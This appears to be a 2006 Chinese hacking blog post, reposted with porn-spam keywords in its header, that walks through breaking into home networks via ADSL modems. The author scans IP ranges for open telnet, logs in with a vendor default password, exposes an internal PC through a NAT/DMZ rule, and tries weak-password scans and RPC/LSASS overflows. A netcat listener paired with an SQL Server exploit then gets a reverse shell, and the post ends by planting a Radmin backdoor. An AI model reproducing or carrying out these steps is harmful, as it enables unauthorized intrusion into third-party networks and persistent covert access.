2020国产成人精品视频,性做久久久久久久久,亚洲国产成人久久综合一区,亚洲影院天堂中文av色

分享

手把手教你穿透ADSL路由入侵內(nèi)網(wǎng)

 藥林怪人.櫻凡 2006-05-05
近來(lái)我對(duì)ADSL MODEM的 路由功能產(chǎn)生了濃厚的興趣,經(jīng)過(guò)一番努力,我終于找到了穿透ADSL路由入侵內(nèi)網(wǎng)的方法,在這里和各位一起分享我的心得……

  也許看爛了網(wǎng)上已有的常規(guī)黑客攻擊手段,對(duì)一些陳舊的入侵手法早已厭煩,近來(lái)我對(duì)ADSL MODEM的 路由功能產(chǎn)生了濃厚的興趣,經(jīng)過(guò)一番努力,我終于找到了穿透ADSL路由入侵內(nèi)網(wǎng)的方法,在這里和各位一起分享我的心得

  一、掃描 

  現(xiàn)在很多ADSL MODEM都是通過(guò) 80 23 21 三個(gè)端口來(lái)管理,但80 21端口有很多服務(wù)器都有打開,沒(méi)怎么特征性,于是我選擇了23端口,打開我的至愛(ài):SUPPERSCAN,填上我所在地區(qū)的IP段,(跨多幾段都沒(méi)關(guān)系,反正SUPPERSCAN的速度就是快)眨眼間,結(jié)果出來(lái)了,開23的主機(jī)還真不小?。海┪姨袅藥着_(tái)出來(lái),在瀏覽器那里輸入IP:218.xxx.xxx.xxx,OK。登陸對(duì)話框出來(lái)了,輸入U(xiǎn)SER:ADSL pass:adsl1234(因?yàn)槲疫@里的adsl modem一般是華碩的,缺省是adsl adsl1234)bingle 一矢中的,現(xiàn)在我就是上帝。

  二、映射

  入侵已經(jīng)成功了一半,要進(jìn)一步入侵內(nèi)網(wǎng),我門要進(jìn)行端口映射,但是我連內(nèi)網(wǎng)的拓?fù)?,都不知道(更不用說(shuō)內(nèi)網(wǎng)主機(jī)的端口開放情況了)又怎么映射呢?在此,我選擇了猜測(cè)。一般來(lái)說(shuō),MODEM的內(nèi)網(wǎng)IP缺省是192.168.1.1,而大多數(shù)就把自己主機(jī)的IP設(shè)成192.168.1.2。因此我們只要試試把192。168。1。2的端口映射出來(lái)就行了(但如果使用了dhcp就麻煩了)但是192。168。1。2到底開放了什么端口,我們根本就不知道啊,呵呵,既然不知道,那么我就把他整臺(tái)主機(jī)透明地映射到外網(wǎng),具體做法如下:進(jìn)入NAT選項(xiàng)---添加NAT規(guī)則---BAMID---填入主機(jī)IP:192。168。1。2,到此192。168。1。2已經(jīng)透明地映射到192。168。1。1上了,我們?cè)L問(wèn)ADSL MODEM就等于訪問(wèn)主機(jī)192。168。1。2了

  三、檢測(cè)漏洞

  現(xiàn)在我們?cè)僬?qǐng)出SUPPERSCAN對(duì)218。xxx.xxx.xxx進(jìn)行掃描,呵,看到?jīng)]有?掃描結(jié)果已經(jīng)不同了,開放的端口是139 1433等,剛才只是開放了80 23 21 而已(也就是說(shuō)我們的映射已經(jīng)成功了)該是X-SCAN出手了,用它來(lái)掃弱口令最好不過(guò)了,但掃描的結(jié)果令人失望,一個(gè)弱口令也沒(méi)有,看來(lái)管理員還不算低B啊

  四、溢出

  既然沒(méi)有弱口令,也沒(méi)開80,那只好從逸出方面著手了,但沒(méi)開80 21 也就webdav .sevr-u的溢出沒(méi)戲了,很自然,我向?qū)Я薘PC溢出,但實(shí)踐證明RPC溢出也是不行的,LSASS溢出也不行

  五、募然回首,那人卻在,燈火闌珊處

  開來(lái)這管理員還是比較負(fù)責(zé)的,該打的補(bǔ)丁都打上了,這時(shí)侯,我的目光轉(zhuǎn)移到1433上了(嘿,不知道他打了SQL補(bǔ)丁沒(méi)有?,心動(dòng)不如行動(dòng),現(xiàn)在只好死馬當(dāng)活馬醫(yī)了,于是
  nc -v -l 99
  sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99
  bingle 成功地得到一個(gè)shell了

  六、設(shè)置后門

  到這里,我們的入侵已經(jīng)成功了,余下的是掃尾留后門,至于后門,我一般都是用FTP上傳RADMIN上去的,呵呵,這里不詳談了,相信各位都知道。

  在入侵過(guò)程中,我遇到了很多困難,希望各位安全愛(ài)好者多多指教,在此向各位給我?guī)椭呐笥眩ㄎㄎ覐埧瘢┱f(shuō)聲謝謝。

    本站是提供個(gè)人知識(shí)管理的網(wǎng)絡(luò)存儲(chǔ)空間,所有內(nèi)容均由用戶發(fā)布,不代表本站觀點(diǎn)。請(qǐng)注意甄別內(nèi)容中的聯(lián)系方式、誘導(dǎo)購(gòu)買等信息,謹(jǐn)防詐騙。如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請(qǐng)點(diǎn)擊一鍵舉報(bào)。
    轉(zhuǎn)藏 分享 獻(xiàn)花(0

    0條評(píng)論

    發(fā)表

    請(qǐng)遵守用戶 評(píng)論公約

    類似文章 更多